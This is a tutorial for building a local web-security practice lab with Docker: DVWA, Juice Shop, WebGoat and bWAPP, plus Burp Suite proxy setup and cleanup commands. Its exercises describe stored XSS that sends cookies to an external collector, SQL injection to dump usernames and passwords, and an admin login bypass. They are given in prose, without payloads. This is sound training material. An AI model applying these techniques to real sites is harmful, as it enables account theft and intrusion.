Web Application Lab Setup
Set up vulnerable web applications locally using Docker for practicing XSS, SQL injection, authentication bypass, and other web security vulnerabilities.
Docker Required
Quick Start with Docker
# Install Docker on Debian/Ubuntu
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
# Add your user to docker group
sudo usermod -aG docker $USER
newgrp docker
# Verify installation
docker --version
docker run hello-worldVulnerable Applications
DVWA
BeginnerDamn Vulnerable Web App - Classic PHP vulnerabilities
vulnerables/web-dvwa OWASP Juice Shop
All LevelsModern JS/Node app with 100+ challenges
bkimminich/juice-shop WebGoat
BeginnerOWASP learning platform for web security
webgoat/webgoat bWAPP
IntermediateBuggy Web Application with 100+ bugs
raesene/bwapp Mutillidae II
BeginnerOWASP Top 10 vulnerable app
citizenstig/nowasp NodeGoat
IntermediateOWASP Node.js vulnerable application
cider/owasp-nodegoat DVWA Setup
DVWA (Damn Vulnerable Web Application) is perfect for beginners. It includes multiple security levels (Low, Medium, High, Impossible) for each vulnerability type.
# Pull and run DVWA
docker run -d -p 80:80 --name dvwa vulnerables/web-dvwa
# Access at http://localhost
# Default credentials: admin / password
# After login, click "Create / Reset Database"
# Then go to DVWA Security and set level to "Low" to startDVWA Vulnerabilities to Practice:
OWASP Juice Shop Setup
Juice Shop is a modern, feature-rich vulnerable application with a gamified experience. It has 100+ challenges across all skill levels and covers the OWASP Top 10.
# Pull and run Juice Shop
docker run -d -p 3000:3000 --name juice-shop bkimminich/juice-shop
# Access at http://localhost:3000
# Features:
# - Built-in score board (find it as a challenge!)
# - 100+ challenges with hints
# - Covers OWASP Top 10 and more
# - Modern JavaScript/Node.js architectureJuice Shop Tips
OWASP WebGoat Setup
# Run WebGoat with WebWolf (companion app)
docker run -d -p 8080:8080 -p 9090:9090 --name webgoat webgoat/webgoat
# WebGoat: http://localhost:8080/WebGoat
# WebWolf: http://localhost:9090/WebWolf
# Register a new account to start
# Lessons are structured with explanations and exercisesDocker Compose: Multiple Apps
Run multiple vulnerable applications at once using Docker Compose.
version: '3'
services:
dvwa:
image: vulnerables/web-dvwa
ports:
- "8081:80"
container_name: dvwa
juice-shop:
image: bkimminich/juice-shop
ports:
- "3000:3000"
container_name: juice-shop
webgoat:
image: webgoat/webgoat
ports:
- "8080:8080"
- "9090:9090"
container_name: webgoat
bwapp:
image: raesene/bwapp
ports:
- "8082:80"
container_name: bwapp
# Run with: docker-compose up -d
# Stop with: docker-compose down# Create docker-compose.yml with above content
# Then run:
docker-compose up -d
# Check running containers
docker ps
# Access points:
# DVWA: http://localhost:8081
# Juice Shop: http://localhost:3000
# WebGoat: http://localhost:8080
# bWAPP: http://localhost:8082
# Stop all
docker-compose downBurp Suite Configuration
Configure Burp Suite to intercept traffic to your local vulnerable apps.
# 1. Start Burp Suite
# 2. Proxy > Options > Add listener on 127.0.0.1:8080
# Browser Configuration (Firefox recommended):
# Settings > Network Settings > Manual proxy
# HTTP Proxy: 127.0.0.1 Port: 8080
# Check "Also use for HTTPS"
# Install Burp CA Certificate:
# 1. Browse to http://burpsuite
# 2. Download CA Certificate
# 3. Import into browser's certificate store
# Target scope (add your apps):
# Target > Scope > Add:
# - http://localhost:3000 (Juice Shop)
# - http://localhost:8081 (DVWA)
# - http://localhost:8080 (WebGoat)Practice Exercises
Exercise 1: SQL Injection (DVWA)
Set security to Low. Go to SQL Injection page. Extract all usernames and passwords from the database.
Exercise 2: XSS Cookie Stealing (DVWA)
Use Stored XSS to inject a payload that sends cookies to a server you control (use webhook.site or requestbin).
Exercise 3: Find the Admin (Juice Shop)
Find the admin's email address, then log in as admin using SQL injection on the login form.
Exercise 4: JWT Manipulation (WebGoat)
Complete the JWT lessons - learn to decode, tamper, and exploit weak JWT implementations.
Cleanup Commands
# Stop specific container
docker stop dvwa juice-shop webgoat
# Remove containers
docker rm dvwa juice-shop webgoat
# Remove all stopped containers
docker container prune
# Remove images to free space
docker rmi vulnerables/web-dvwa bkimminich/juice-shop webgoat/webgoat
# Nuclear option - remove everything
docker system prune -a💡 Pro Tip
Start with DVWA on "Low" security to understand each vulnerability type. Then increase difficulty and try Juice Shop for a more realistic modern web app experience. Document your findings as you would in a real pentest report.